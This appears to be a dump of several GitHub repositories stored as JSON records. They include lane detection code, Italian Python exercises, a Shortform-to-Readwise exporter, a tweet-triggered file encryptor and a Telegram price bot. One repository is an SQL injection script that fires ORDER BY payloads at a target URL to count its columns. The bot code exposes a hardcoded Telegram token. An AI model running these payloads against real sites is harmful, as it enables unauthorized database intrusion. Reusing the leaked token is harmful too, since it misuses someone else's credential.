prev_left_fit[2] - margin)) &\n (nonzerox < (prev_left_fit[0]*(nonzeroy**2) + prev_left_fit[1]*nonzeroy + prev_left_fit[2] + margin)))\n right_lane_inds = ((nonzerox > (prev_right_fit[0]*(nonzeroy**2) + prev_right_fit[1]*nonzeroy + prev_right_fit[2] - margin)) &\n (nonzerox < (prev_right_fit[0]*(nonzeroy**2) + prev_right_fit[1]*nonzeroy + prev_right_fit[2] + margin)))\n \n # Extract left and right positions of the pixels in the lane lines\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds]\n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds]\n \n return leftx, lefty, rightx, righty"
}
] | 7 |
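The sliding-window search in `helpers.find_lane_pixels` seeds its left and right windows from a column-sum histogram of the bottom third of the warped binary image. That seeding step, isolated on a toy image:

```python
import numpy as np

# Toy 6x8 binary "warped" image; two bright columns stand in for lane lines
binary = np.zeros((6, 8), dtype=np.uint8)
binary[:, 1] = 1   # left lane pixels
binary[:, 6] = 1   # right lane pixels

histogram = np.sum(binary[binary.shape[0] * 2 // 3:, :], axis=0)
midpoint = histogram.shape[0] // 2
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:]) + midpoint
print(leftx_base, rightx_base)  # 1 6
```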
elisagiacomini/programming.lab
|
https://github.com/elisagiacomini/programming.lab
|
7374340ed875b17702566f2e760b184a4abbb70d
|
03cef1f1befa3aeb0ccc74c89f5663bdc3e50712
|
0001e8b4a35ea0530cb0f6f803b896da96d06ce3
|
refs/heads/main
| 2023-01-27T17:46:24.651148 | 2020-12-01T16:03:04 | 2020-12-01T16:03:04 | 311,688,417 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6465827226638794,
"alphanum_fraction": 0.6645683646202087,
"avg_line_length": 36.03333282470703,
"blob_id": "532b7c342a0030b4a51b454156503d8d46260496",
"content_id": "bd32315e32d68b39405bb9d07e091ba6aaee37fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1124,
"license_type": "no_license",
"max_line_length": 199,
"num_lines": 30,
"path": "/temp/l5es.py",
"repo_name": "elisagiacomini/programming.lab",
"src_encoding": "UTF-8",
"text": "# Modificate l’oggetto CSVFile della lezione precedente in modo che dia un messaggio d’errore se si cerca di aprire un file non esistente. Poi, aggiungete questi due campi al file shampoo_sales.csv”:\n# 01-01-2015, \n# 01-02-2015, ciao\n# egestite gli errori che verranno generati in modo che le linee vengano saltate ma che venga stampato a schermo l’errore Alla fine ricordatevi di committare tutto.\n\n# Inizializzo una lista vuota per salvare i valori\nvalues = []\n\ntry:\n# Apro e leggo il file, linea per linea\n my_file = open('shampoo_sales_2.csv', 'r')\n\nexcept:\n print('Il file è inesistente.')\n\n for line in my_file:\n # Faccio lo split di ogni riga sulla virgola\n elements = line.split(',')\n \n # Se NON sto processando l’intestazione...\n if elements[0] != 'Date':\n # Setto la data e il valore\n date = elements[0]\n value = elements[1]\n # Aggiungo alla lista dei valori questo valore\n values.append(float(value))\n print(values)\n\nsomma = sum(values)\nprint('La somma dei valori della lista è: {}'.format(somma))\n\n"
},
{
"alpha_fraction": 0.6057692170143127,
"alphanum_fraction": 0.7115384340286255,
"avg_line_length": 34,
"blob_id": "fe75bb717f16b707bfaeafac476ae3a3cff580e1",
"content_id": "55c3414505dd932fcbbc5c6bb64a838dbdf594dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 105,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 3,
"path": "/sommalista.py",
"repo_name": "elisagiacomini/programming.lab",
"src_encoding": "UTF-8",
"text": "listavalori=[1,3,6,8,9,12,16,19]\nsomma=sum(listavalori)\nprint(\"La somma dei valori è: {}\".format(somma))"
},
{
"alpha_fraction": 0.5806451439857483,
"alphanum_fraction": 0.6209677457809448,
"avg_line_length": 19.83333396911621,
"blob_id": "afdf9e93a83cfec7061e83eab92bacba7ff76b88",
"content_id": "7a03eaeb8b214db48f8dfaa226f4194903553d7d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 124,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 6,
"path": "/sommalistasol.py",
"repo_name": "elisagiacomini/programming.lab",
"src_encoding": "UTF-8",
"text": "def list_sum(the_list):\n sum=0\n for item in the_list:\n sum = sum + item\n print(\"Somma: {}\".format(sum))\nlist_sum([1,4,10])"
},
{
"alpha_fraction": 0.5784753561019897,
"alphanum_fraction": 0.5838565230369568,
"avg_line_length": 28.342105865478516,
"blob_id": "8db9c706ecebebed9caf8dbf4b77aaae2e3723ab",
"content_id": "bddfeb1b1376b16ef29845f4848261f8f4f6982c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1124,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 38,
"path": "/shampoo_sales.py",
"repo_name": "elisagiacomini/programming.lab",
"src_encoding": "UTF-8",
"text": "# Create un oggetto CSVFile che rappresenti un file CSV, e che:\n#1) venga inizializzato sul nome del file csv, e\n#2) abbia un attributo “name” che ne contenga il nome\n#3) abbia un metodo “get_data” che torni i dati dal file CSV come numeri di una lista (come abbiamo già visto).\n\n# oggetto CSVFile\n# - init(filename)\n# - name\n# - get_data\n# return dati\n\n\nclass CSVFile:\n def __init__(self, name):\n self.name = name\n \n def get_data(self):\n values = []\n\n # Inizializzo la lista vuota per salvare i\n my_file = open(self.name, 'r')\n\n for line in my_file:\n # faccio lo split di ongi riga sulla virgola\n elements = line.split(',')\n\n # Se NON sto processando l'intestazione...\n if elements[0] != 'Date':\n # Setto la data e il valore\n date = elements [0]\n value = elements [1]\n # Aggiungo alla lista dei valori questo valore\n values.append(float(value))\n return values\n \n\nmy_file = CSVFile(name = 'shampoo_sales.csv')\nprint(my_file.get_data())\n"
},
{
"alpha_fraction": 0.6234718561172485,
"alphanum_fraction": 0.6234718561172485,
"avg_line_length": 23.117647171020508,
"blob_id": "4168624b1d114ec13837b66db840f09624fd1cd1",
"content_id": "7a336664182cb031ffebbe787c0a9d4f8b62a672",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 409,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 17,
"path": "/temp/esempioimplementazione.py",
"repo_name": "elisagiacomini/programming.lab",
"src_encoding": "UTF-8",
"text": "class Model(object):\n\n def fit(self,data):\n pass\n \n def predict(self):\n pass\n\nclass IncrementMode(Model):\n\n def fit(self,data):\n raise NotImplementedError('Questo modello non prevede un fit')\n \n def predict(self, prev_months):\n # codice per far funzionare la predizione\n # Nota: prev_months deve contenere i dati degli 'n' mesi precedenti \n pass"
},
{
"alpha_fraction": 0.6929375529289246,
"alphanum_fraction": 0.711361289024353,
"avg_line_length": 21.18181800842285,
"blob_id": "2a4fee23233fae8137fb2954c7e77269081063c4",
"content_id": "df9f2bad0122b165b94954bea2b391b991039492",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 977,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 44,
"path": "/esempioclasse.py",
"repo_name": "elisagiacomini/programming.lab",
"src_encoding": "UTF-8",
"text": "\n\nclass Pagina:\n # numero\n # pagina\n # testo\n\n def __init__(self,numero,capitolo,testo):\n\n self.numero = numero\n self.capitolo = capitolo\n self.testo = testo\n\npagina1 = Pagina(numero=1, capitolo='Primo Capitolo',testo='blah blah')\n\npagina2 = Pagina(numero=2, capitolo='Secondo Capitolo', testo='ciao ciao')\n\nprint(pagina1.testo)\nprint(pagina2.testo)\n\nclass PaginaSinistra(Pagina):\n \n def posizione_numero(self):\n return 'sinistra'\n\nclass PaginaDestra(Pagina):\n def posizione_numero(self):\n return 'destra'\n\npagina1 = PaginaSinistra(numero=1, capitolo='Primo Capitolo', testo = 'blah blah')\npagina2 = PaginaDestra(numero=2, capitolo='Secondo Capitolo', testo='ciao ciao')\n\nprint(pagina1.testo)\nprint(pagina1.numero)\nprint(pagina2.testo)\nprint(pagina2.numero)\nprint(PaginaSinistra.posizione_numero(pagina1))\nprint(PaginaDestra.posizione_numero(pagina2))\n\n\nlibro=[]\n\nlibro.append(pagina1)\nlibro.append(pagina2)\n\nprint(libro)"
}
] | 6 |
reyvand/sqli-column-detector
|
https://github.com/reyvand/sqli-column-detector
|
5a77d8b6bd42ce6e3da93d8cb0e43a971ca57245
|
f3750a3b682fdb0dc73d54e6784fbd48b081d988
|
f033ac5465d79b15ac6b1ec2a65b02519b4c73d0
|
refs/heads/master
| 2021-05-01T19:19:15.683664 | 2018-02-10T14:05:22 | 2018-02-10T14:05:22 | 121,019,498 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7363184094429016,
"alphanum_fraction": 0.7412935495376587,
"avg_line_length": 23.125,
"blob_id": "a63288c981957ead14a925a7475ccfa9dfd701c6",
"content_id": "6f1e0e255c15085aa5329e23d46c91d332cf514e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 201,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 8,
"path": "/readme.md",
"repo_name": "reyvand/sqli-column-detector",
"src_encoding": "UTF-8",
"text": "# SQLi Column Detector\r\n\r\nSimple automated script to check available column from SQL Injection method\r\n\r\n### Requirements\r\n\r\n- python3\r\n- Libraries needed : re, requests (you can install it with pip)\r\n"
},
{
"alpha_fraction": 0.6204212307929993,
"alphanum_fraction": 0.6295787692070007,
"avg_line_length": 32.15625,
"blob_id": "0ff03e2142e52fc48a52e1583431017f8f27876e",
"content_id": "3d460a4071dedb970054079f1946c593055cf4f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2184,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 64,
"path": "/sqli.py",
"repo_name": "reyvand/sqli-column-detector",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\r\n\r\n'''\r\ni <3 asuka\r\n'''\r\nimport re\r\nimport requests as r\r\nfrom argparse import ArgumentParser\r\nfrom bs4 import BeautifulSoup as bs\r\n\r\ndef show_payload():\r\n\tbanner = \"\\nList of Available Payload\\n\\n 1 String Based Injection\\t' order by X-- -\\n 2 Integer Based Injection\\torder by X-- -\"\r\n\treturn banner\r\n\r\ndef payload(num):\r\n\tpl = {1:\"'order by \", 2:' order by '}\r\n\treturn pl[num]\r\n\r\ndef check(target, payload, col):\r\n\ttmp = list()\r\n\tc = 1\r\n\terror = ['Warning','warning','Error','error','Unknown','unknown','Column','Clause','clause','expects','parameter','resource','boolean','check','manual','order']\r\n\tx = set(r.get(target+\"'\").text.split(\" \")).intersection(set(error))\r\n\tif len(x) > 0:\r\n\t\tprint(\"Error detected\")\r\n\t\twhile c <= col :\r\n\t\t\turl = target+payload+\"%i -- -\" %c\r\n\t\t\tphew = r.get(url).text\r\n\t\t\tprint(re.findall(r\"Column|Clause|clause'|expects|parameter|resource|boolean|check|manual|'order\", phew))\r\n\t\t\tif len(re.findall(r\"Column|Clause|clause'|expects|parameter|resource|boolean|check|manual|'order\", phew)) > 0:\r\n\t\t\t\tprint(\"Column found : %i\" %(c-1))\r\n\t\t\t\tbreak\r\n\t\t\telse:\r\n\t\t\t\tprint(\"Tryin' ordered by %i\" %c)\r\n\t\t\tc += 1\r\n\telse:\r\n\t\tprint(\"Error not detected\")\r\n\t\twhile c <= col :\r\n\t\t\turl = target+payload+\"%i -- -\" %c\r\n\t\t\tx = r.get(url).text\r\n\t\t\tif len(tmp) < 1:\r\n\t\t\t\ttmp.append(x)\r\n\t\t\t\r\n\t\t\tif x == tmp[len(tmp)-1]:\r\n\t\t\t\ttmp.append(x)\r\n\t\t\t\tprint(\"Tryin' ordered by %i\" %c)\r\n\t\t\telse:\r\n\t\t\t\tprint(\"Column found : %i\" %(c-1))\r\n\t\t\t\tbreak\r\n\t\t\tc += 1\r\n\r\n\r\nif __name__ == '__main__':\r\n\tparser = ArgumentParser(description=\"Simple SQL Injection Tools to Check Column's Count and Print Some Basic Info\")\r\n\tparser.add_argument('-t', '--target', dest=\"target\", help=\"specify the target url\")\r\n\tparser.add_argument('-p', '--payload', dest=\"payload\", help=\"choose the payload\", type=int)\r\n\tparser.add_argument('-c', '--columns', dest=\"col\", help=\"set the max columns guest. default=20\", type=int, default=20)\r\n\tparser.add_argument('--show-payload', dest=\"show\", action=\"store_true\", help=\"list of available payload\")\r\n\targs = parser.parse_args()\r\n\r\n\tif args.show == True:\r\n\t\tprint(show_payload())\r\n\telse:\r\n\t\tcheck(args.target, payload(args.payload), args.col)"
}
] | 2 |
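The `check` function above implements the classic ORDER BY probe: `order by N` behaves normally while N is at most the number of selected columns, and errors (or changes the page) once N exceeds it, so the last working N is the column count. The probe URLs it issues look like this sketch (the target is a placeholder):

```python
target = 'http://example.com/item.php?id=1'  # placeholder target
payload = ' order by '                       # integer-based payload (option 2)

for c in range(1, 4):
    print(target + payload + '%i -- -' % c)
# http://example.com/item.php?id=1 order by 1 -- -
# http://example.com/item.php?id=1 order by 2 -- -
# http://example.com/item.php?id=1 order by 3 -- -
```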
TretornESP/DeadManLatch
|
https://github.com/TretornESP/DeadManLatch
|
a07ab9de1f5659e50cc148598a238fa3742c2c31
|
ce713f617fa24979edb93d64e330ea5790f107c2
|
cb5bf3d2425c9f086c9a0f3aebcd6bd57db50eb5
|
refs/heads/main
| 2023-02-10T04:07:11.668728 | 2021-01-01T15:06:59 | 2021-01-01T15:06:59 | 326,000,734 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6200578808784485,
"alphanum_fraction": 0.6264866590499878,
"avg_line_length": 36.03571319580078,
"blob_id": "ef197554b68cbffa8012d1e8194cb971d277ad0a",
"content_id": "b7d4614ff2a83abc3634cf345701c9ea053ef26a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3111,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 84,
"path": "/saveme.py",
"repo_name": "TretornESP/DeadManLatch",
"src_encoding": "UTF-8",
"text": "#Twitter encriptor controller (Watches a hashtag for orders and decrypts or encrypts)\n#This software is just for testing purposes, dont rely on it on the real world!!\n\nfrom pathlib import Path\nimport tweepy\nimport pyAesCrypt\nimport time\nimport os\n\n#place your files under the folder secretos_de_estado\n#the file pwd.txt must contain the password for encrypt/decrypt IT WILL BE HASHED TOO!!\n#tweets must be like:\n #hashtag pwd:password\n#if decrypting password must be the decryption key (yeah, i know, pretty dumb if someone copied our data)\n#if encrypting password must be the same as trigger field below\n\n####input your credentials here (Get a twitter developer account)\nconsumer_key = ''\nconsumer_secret = ''\naccess_token = ''\naccess_token_secret = ''\n###input your hashtags\nsafe_hashtag=\"#imsafenow\"\nrisk_hashtag=\"#imatrisknow\"\n###input the encrypt activation passphrase NOT THE SAME AS THE ENCRYPTION KEY!!!\n###This is just to avoid people randomly triggering the encryption process\ntrigger=\"patata\"\n\nlast_risk = ''\nlast_safe = ''\n\n\ndef encrypt():\n bufferSize = 64 * 1024\n with open(\"./secretos_de_estado/pwd.txt\", 'r') as reader:\n password = reader.read()\n # encrypt\n pathlist = Path(\"./secretos_de_estado\").glob('./*.*')\n for path in pathlist:\n # because path is object not string\n path_in_str = str(path)\n print(path_in_str)\n pyAesCrypt.encryptFile(path_in_str, path_in_str+\".aes\", password, bufferSize)\n os.remove(path_in_str)\n\ndef decrypt(password):\n bufferSize = 64 * 1024\n # decrypt\n pathlist = Path(\"./secretos_de_estado\").glob('./*.*')\n for path in pathlist:\n # because path is object not string\n path_in_str = str(path)\n print(path_in_str)\n pyAesCrypt.decryptFile(path_in_str, path_in_str[:-4], password, bufferSize)\n os.remove(path_in_str)\n\ndef tweet(enc):\n global last_risk, last_safe\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth,wait_on_rate_limit=True)\n\n while True:\n time.sleep(5)\n if enc:\n for tweet in tweepy.Cursor(api.search,q=safe_hashtag,count=100, since_id=last_risk).items():\n print (tweet.created_at, tweet.text)\n if \"pwd:\" in tweet.text:\n if tweet.text[tweet.text.index(\"pwd:\") + len(\"pwd:\"):] == trigger:\n last_risk = tweet.id\n encrypt()\n return\n else:\n for tweet in tweepy.Cursor(api.search,q=risk_hashtag,count=100, since_id=last_safe).items():\n print (tweet.created_at, tweet.text)\n if \"pwd:\" in tweet.text:\n print(\"PWD DETECTED: \" +tweet.text[tweet.text.index(\"pwd:\") + len(\"pwd:\"):])\n last_safe = tweet.id\n decrypt(tweet.text[tweet.text.index(\"pwd:\") + len(\"pwd:\"):])\n return\n\nif __name__==\"__main__\":\n while True:\n tweet(os.path.isfile('./secretos_de_estado/pwd.txt'))\n"
}
] | 1 |
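The control tweets that `saveme.py` polls for follow the `hashtag pwd:password` convention described in its header comments. With the script's default hashtags and trigger, they would look like this (the decryption key is a made-up example):

```
#imsafenow pwd:patata            -> matches `trigger`, so the watcher encrypts the folder
#imatrisknow pwd:myAesPassword   -> the watcher decrypts the folder with the given key
```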
nicolevanderhoeven/shortform-to-readwise | https://github.com/nicolevanderhoeven/shortform-to-readwise | 3e41308ee5f983fd8ba920bffe89f0372c663df9 | d8aeb2d507f54bfe7993836347fbc4f4ca5b428b | 734a42abbff3b65707d9d7a590b9297db6e9e578 | refs/heads/master | 2023-08-11T06:25:25.381209 | 2021-10-10T21:23:38 | 2021-10-10T21:23:38 | 395,456,045 | 9 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7592592835426331,
"alphanum_fraction": 0.7592592835426331,
"avg_line_length": 26,
"blob_id": "1992f717a908e2ab3861ca4b22730a533be9cb9e",
"content_id": "04e110b8cde627bbee009a3509e3db1e4a1e3b19",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 162,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 6,
"path": "/variables.py",
"repo_name": "nicolevanderhoeven/shortform-to-readwise",
"src_encoding": "UTF-8",
"text": "# Your authorization token for Shortform\nauthToken = ''\n\n# Your Readwise API token\n# Retrieve this token from https://readwise.io/access_token\nreadwiseToken = ''\n"
},
{
"alpha_fraction": 0.7598615884780884,
"alphanum_fraction": 0.7716262936592102,
"avg_line_length": 67.80952453613281,
"blob_id": "4ffda2af1efd9c3f490a61325cc773ba50d1f9bb",
"content_id": "747e2e64b4b28bb98f691f5370de5931de027346",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1445,
"license_type": "no_license",
"max_line_length": 597,
"num_lines": 21,
"path": "/README.md",
"repo_name": "nicolevanderhoeven/shortform-to-readwise",
"src_encoding": "UTF-8",
"text": "# Shortform to Readwise\n\n\n\nThis script scrapes [Shortform](https://www.shortform.com) for highlights and sends them to [Readwise](https://readwise.io). Accounts with both Shortform and Readwise are required.\n\n## Usage\n\nFor more detailed instructions, check out my blog post [here](https://nicolevanderhoeven.com/blog/20210815-shortform-to-readwise/).\n\nEnter the required data in `variables.py`.\n\n`authToken` is the Authorization token that you use for Shortform. Shortform unfortunately doesn't expose this, but you can find out yours by opening up DevTools in Chrome or Firefox and navigating to, for example, [your highlights page](https://www.shortform.com/app/highlights). In the DevTools Network tab, look for the request with the name `?sort=date` and click on it. In the Request Headers panel, you'll see a header `Authorization`, with the value `Basic <your token>`. Copy everything after `Basic ` and paste it into `variables.py`. _(Note: There shouldn't be any spaces in the token.)_\n\n`readwiseToken` is your API token for Readwise, which you can get [here](https://readwise.io/access_token).\n\nClone or download this repo, cd into it, and run the main script: `python3 gethighlights.py` .\n\nYou should be able to see your highlights appear in [your Readwise library](https://readwise.io/books).\n\nTo run this script automatically, you can use crontab or similar.\n"
},
{
"alpha_fraction": 0.48318761587142944,
"alphanum_fraction": 0.5060524344444275,
"avg_line_length": 39.73972702026367,
"blob_id": "e2308030e8178b8e59c4e9fee33232fd944a6504",
"content_id": "56a8eec9ea760b41e0da83822cd974c4aad477e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2974,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 73,
"path": "/gethighlights.py",
"repo_name": "nicolevanderhoeven/shortform-to-readwise",
"src_encoding": "UTF-8",
"text": "import re\nimport glob\nimport os\nimport requests\nimport calendar\nimport time\nimport json\nimport datetime\n\nfrom variables import authToken, readwiseToken\n\nreadwiseUrl = 'https://readwise.io/api/v2/highlights/'\ndict = {}\ndict['highlights'] = []\ncontents = []\ndictData = {}\n\n# Get highlights\nresponse = requests.get('https://www.shortform.com/api/highlights/?sort=date', headers={\"Authorization\": \"Basic \" + authToken, \"X-Sf-Client\": \"11.7.0\"})\n\n# Parse JSON body\nobj = json.loads(response.content)\nfor item in obj: # data\n for key in obj[item]: # unnamed full highlight obj\n dictData = {}\n for prop in key: # content, created, id, quote, text...\n if prop == 'content':\n for param in key[prop]: # content_type, doc, id, order, title, url_slug\n if param == 'doc':\n for meta in key[prop][param]: # author, cover_image, doc_type, id, title, url_slug\n value = key[prop][param][meta]\n if meta == 'author':\n dictData['author'] = value\n if meta == 'cover_image':\n dictData['imageUrl'] = 'https:' + value.replace('\\\\','')\n if meta == 'title':\n dictData['title'] = 'Shortform-' + value\n if meta == 'url_slug':\n dictData['source_url'] = 'https://www.shortform.com/app/book/' + value\n if param == 'order':\n dictData['location'] = key[prop][param]\n dictData['location_type'] = 'page'\n if prop == 'created':\n # value = key[prop]\n # Shortform date format: 2021-08-14T21:14:43.107973+00:00\n # Readwise's expected format: 2020-07-14T20:11:24+00:00\n # Current output format: 2021-09-02T18:56:39+00:00\n # Turn value into datetime, remove microseconds, convert it to string, and add : in the timezone.\n value = datetime.datetime.strptime(key[prop], '%Y-%m-%dT%H:%M:%S.%f%z')\n value = value.replace(microsecond=0)\n value = value.strftime('%Y-%m-%dT%H:%M:%S%z')\n tzMins = value[-2:]\n value = value[:-2] + ':' + tzMins\n dictData['highlighted_at'] = value\n if prop == 'quote':\n value = key[prop]\n dictData['text'] = value.replace('\\n','')\n if prop == 'text':\n value = key[prop]\n if value != '':\n dictData['note'] = value\n if dictData != {}:\n dictData['source_type'] = 'book'\n dict['highlights'].append(dictData)\n\n# Send highlights to Readwise\n# response = requests.post(\n# url=readwiseUrl,\n# headers={\"Authorization\": \"Token \" + readwiseToken},\n# json=dict\n# )\n\nprint(dict)\n"
}
] | 3 |
krpromer/mBot | https://github.com/krpromer/mBot | 6d22017ede6ce2596399dc0b65f9626af0ac26ed | 41d980c4b274bc0a358451312e9f0b0b495a688b | 9f5603c315e5aad10ab81fa2ad66c301816e1e69 | refs/heads/master | 2020-02-26T13:29:03.395680 | 2017-07-01T14:53:15 | 2017-07-01T14:53:15 | 95,525,980 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4285714328289032,
"alphanum_fraction": 0.6394557952880859,
"avg_line_length": 10.230769157409668,
"blob_id": "654401d3ed344f7875354a1ff4c9b80ebe04f471",
"content_id": "89a722dc5106008996e7dd5d81f484c34672c52a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 147,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 13,
"path": "/new.ini",
"repo_name": "krpromer/mBot",
"src_encoding": "UTF-8",
"text": "[INFO]\nversion = 1\nrun = 1\n\n[COIN]\nbtc_ltc = 1\nbtc_waves = 1\nbtc_snm = 1\n\n[PRICE]\nbtc_ltc = 0.00000001\nbtc_waves = 0.00000001\nbtc_snm = 0.0000001\n\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.75,
"avg_line_length": 11,
"blob_id": "60a4366bf1fff2813f9a4d558dfae18cb2a98aa4",
"content_id": "c8c4c3635a69769894c86288e04fc3415b1a9ef7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 24,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 2,
"path": "/README.md",
"repo_name": "krpromer/mBot",
"src_encoding": "UTF-8",
"text": "# mBot\nFor telegram bot\n"
},
{
"alpha_fraction": 0.614833414554596,
"alphanum_fraction": 0.6413471698760986,
"avg_line_length": 27.18181800842285,
"blob_id": "5124b56915210811b4bac2e0727f24276188e700",
"content_id": "f87144476722218e07337b3d6875f986d84d8788",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2793,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 99,
"path": "/bot.py",
"repo_name": "krpromer/mBot",
"src_encoding": "UTF-8",
"text": "import ConfigParser\nimport subprocess\nimport requests\nimport json\nimport time\n\nTOKEN = \"439659276:AAFoPRUbHjsLOmEtN5aDieR1HjU_VojBmUY\"\nCHAT_ID = \"64750298\"\nPOLONIEX_URL = \"http://poloniex.com/public?command=returnTicker\"\nBITTREX_URL = \"https://bittrex.com/api/v1.1/public/getticker?market=btc-waves\"\nLIQUI_URL = \"https://api.liqui.io/api/3/ticker/snm_btc\"\n\nBOT_URL = \"https://api.telegram.org/bot{}/\".format(TOKEN)\n\nBTC_LTC = 0\nBTC_WAVES = 0\nBTC_SNM = 0\nPRICE_LTC = 0.00000001\nPRICE_WAVES = 0.00000001\nPRICE_SNM = 0.00000001\nTEMP = 0.00000001\nrun = 1\n\ndef get_url(url):\n response = requests.get(url)\n content = response.content.decode(\"utf8\")\n return content\n\ndef send_message(text, chat_id):\n url = BOT_URL + \"sendMessage?text={}&chat_id={}\".format(text, chat_id)\n get_url(url)\n\ndef diff(a, b):\n\tif a > b:\n\t\treturn a/b\n\telse:\n\t\treturn b/a\n\nwhile run:\n\tp = subprocess.Popen('git pull', shell = True, stdout = subprocess.PIPE, stderr = subprocess.STDOUT)\n\n\tmConfig = ConfigParser.ConfigParser()\n\tmConfig.read('config.ini')\n#print 'Version', mConfig.getint('INFO', 'version')\n\tBTC_LTC = mConfig.getint('COIN', 'BTC_LTC')\n\tBTC_WAVES = mConfig.getint('COIN', 'BTC_WAVES')\n\tBTC_SNM = mConfig.getint('COIN', 'BTC_SNM')\n\trun = mConfig.getint('INFO', 'run')\n\n\tif BTC_LTC == 1:\n\t\tPRICE_LTC = mConfig.getfloat('PRICE', 'BTC_LTC')\n\t\tcontent = get_url(POLONIEX_URL)\n\t\tif content == \"\":\n\t\t\tprint 'POLO ERROR'\n\t\telse:\n\t\t\tcoinInfo = json.loads(content)\n\t\t\tTEMP = float(coinInfo['BTC_LTC']['last'])\n\t\t\tCH = diff(PRICE_LTC, TEMP)\n\t\t\tprint 'price=',PRICE_LTC,' now=',TEMP,' debug ltc = ', CH\n\t\t\tif CH > 1.05:\n\t\t\t\tmConfig.set('PRICE','BTC_LTC',TEMP)\n\t\t\t\tMSG = \"LTC =\", TEMP\n\t\t\t\tsend_message(MSG, CHAT_ID)\n\n\tif BTC_WAVES == 1:\n\t\tPRICE_WAVES = mConfig.getfloat('PRICE', 'BTC_WAVES')\n\t\tcontent = get_url(BITTREX_URL)\n\t\tif content == \"\":\n\t\t\tprint 'BITTREX ERROR'\n\t\telse:\n\t\t\tcoinInfo = json.loads(content)\n\t\t\tTEMP = float(coinInfo['result']['Last'])\n\t\t\tCH = diff(PRICE_WAVES, TEMP)\n\t\t\tprint 'price=',PRICE_WAVES,' now=',TEMP,' debug waves = ', CH\n\t\t\tif CH > 1.05:\n\t\t\t\tmConfig.set('PRICE','BTC_WAVES',TEMP)\n\t\t\t\tMSG = \"WAVES =\", TEMP\n\t\t\t\tsend_message(MSG, CHAT_ID)\n\n\tif BTC_SNM == 1:\n\t\tPRICE_SNM = mConfig.getfloat('PRICE', 'BTC_SNM')\n\t\tcontent = get_url(LIQUI_URL)\n\t\tif content == \"\":\n\t\t\tprint 'LIQUI ERRROR'\n\t\telse:\n\t\t\tcoinInfo = json.loads(content)\n\t\t\tTEMP = float(coinInfo['snm_btc']['last'])\n\t\t\tCH = diff(PRICE_SNM, TEMP)\n\t\t\tprint 'price=',\"{0:.8f}\".format(PRICE_SNM),' now=',\"{0:.8f}\".format(TEMP),' debug snm = ',\"{0:.8f}\".format(CH)\n\t\t\tif CH > 1.05:\n\t\t\t\tmConfig.set('PRICE','BTC_SNM',TEMP)\n\t\t\t\tMSG = \"SNM =\", \"{0:.8f}\".format(TEMP)\n\t\t\t\tsend_message(MSG, CHAT_ID)\n\t\n\tmConfigFile = open('config.ini', 'w')\n\tmConfig.write(mConfigFile)\n\tmConfigFile.close()\n\tprint time.strftime(\"%y/%m/%d %H:%M:%S\", time.localtime())\n\ttime.sleep(30)\n\n"
},
{
"alpha_fraction": 0.4413793087005615,
"alphanum_fraction": 0.6275861859321594,
"avg_line_length": 10.076923370361328,
"blob_id": "d22431012d85b458f7248305fbedd2c0b4f3cdaf",
"content_id": "941a32341d78e87b26117953c145030e1c258f3a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 145,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 13,
"path": "/config.ini",
"repo_name": "krpromer/mBot",
"src_encoding": "UTF-8",
"text": "[INFO]\nversion = 1\nrun = 1\n\n[COIN]\nbtc_ltc = 1\nbtc_waves = 1\nbtc_snm = 1\n\n[PRICE]\nbtc_ltc = 0.01576466\nbtc_waves = 0.001519\nbtc_snm = 2.782e-05\n\n"
}
] | 4 |
